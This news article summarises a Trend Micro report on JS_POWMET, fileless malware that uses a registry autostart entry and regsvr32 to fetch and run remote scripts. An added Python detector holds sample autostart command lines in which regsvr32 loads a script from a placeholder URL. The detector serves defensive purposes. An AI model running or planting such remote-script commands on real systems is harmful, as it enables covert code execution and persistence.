A newly observed Windows malware called JS_POWMET features an end-to-end fileless infection chain, installing itself without leaving a trace on the hard drive by abusing an autostart registry entry.
Such discoveries are rare, explains Trend Micro in a Wednesday blog post, because most fileless malware programs are technically only fileless when first infecting a user’s system. Upon actually executing the main malicious payload, they typically end up writing themselves to disk, the post continues.
But not JS_POWMET, which leaves no evidence of itself on the machine, making it difficult for researchers to analyze.
“In this method, a URL was given to regsvr32 [the Microsoft Register Server] as a parameter, which will make regsvr32 capable of fetching the file… found on the URL. Due to this routine, regsvr32 will become capable of executing arbitrary scripts without saving the XML file on the machine/system. In particular, whenever the affected machine starts up, it will automatically download the malicious file from its Command & Control (C&C) server,” the blog post states.
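As an added defender-side example (not code from the Trend Micro post), the following Python checks autostart command lines for the pattern described above: regsvr32 launched with a URL as a parameter. The sample entries, hostnames and DLL names are constructed placeholders.

```python
"""Flag autostart commands that launch regsvr32 with a URL argument.
Example code; the entries below are constructed, not real indicators."""
import re
import shlex
from typing import Dict, List

# Constructed sample autostart entries (value name -> command line).
SAMPLE_AUTOSTART: Dict[str, str] = {
    "CloudSync": r'"C:\Program Files\CloudSync\CloudSync.exe" /background',
    "UpdateHelper": r"regsvr32.exe /s /i:https://example.invalid/autorun.sct placeholder.dll",
    "VendorCOM": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"',
    "SysHelper": r"cmd.exe /c REGSVR32 /s /n /u /i:http://example.invalid/a placeholder.dll",
}

# A URL scheme anywhere inside an argument (e.g. "/i:http://...").
URL_RE = re.compile(r"(?i)\b(?:https?|ftp)://\S+")


def _basename(token: str) -> str:
    """Strip quotes and directory components from a command token."""
    return token.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_remote_regsvr32(command: str) -> bool:
    """True if the command runs regsvr32 and passes it a URL argument.

    The regsvr32 token may appear after a wrapper such as cmd.exe /c,
    so every token is checked, and a URL must follow it.
    """
    try:
        argv = shlex.split(command, posix=False)  # keep Windows backslashes
    except ValueError:
        argv = command.split()
    for i, token in enumerate(argv):
        if _basename(token) in ("regsvr32", "regsvr32.exe"):
            return any(URL_RE.search(arg) for arg in argv[i + 1:])
    return False


def find_remote_regsvr32(entries: Dict[str, str]) -> List[str]:
    """Return the names of autostart entries that match the pattern."""
    return [name for name, cmd in entries.items() if is_remote_regsvr32(cmd)]


if __name__ == "__main__":
    for name in find_remote_regsvr32(SAMPLE_AUTOSTART):
        print("suspicious autostart entry:", name, "->", SAMPLE_AUTOSTART[name])
```

A local DLL registration (the VendorCOM entry) is not flagged, since only the combination of regsvr32 and a remote URL matches the behaviour described in the post.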
Next, JS_POWMET downloads a secondary file, a PowerShell script called TROJ_PSINJECT, which connects to a website from which a file called favicon is downloaded. “The favicon file will then be decrypted and injected into its process using ReflectivePELoader, which is used for injecting EXE/DLL files,” the blog post continues.
According to Trend Micro researchers, nearly 90 percent of JS_POWMET infections have affected targets in the Asia-Pacific region. In all likelihood, most infections occur due to either malware droppers or from visiting malicious sites.
“While JS_POWMET and the rest of the files it downloads are relatively light in terms of impact, this malware demonstrates the lengths cybercriminals will go to avoid detection and analysis,” wrote blog post author Michael Villanueva, Trend Micro threat research engineer. “It also shows that even relatively uncommon infection methods involving fileless malware continually evolve.”
To mitigate such threats, Trend Micro recommends using container-based systems to limit access to important infrastructure, as well as disabling PowerShell.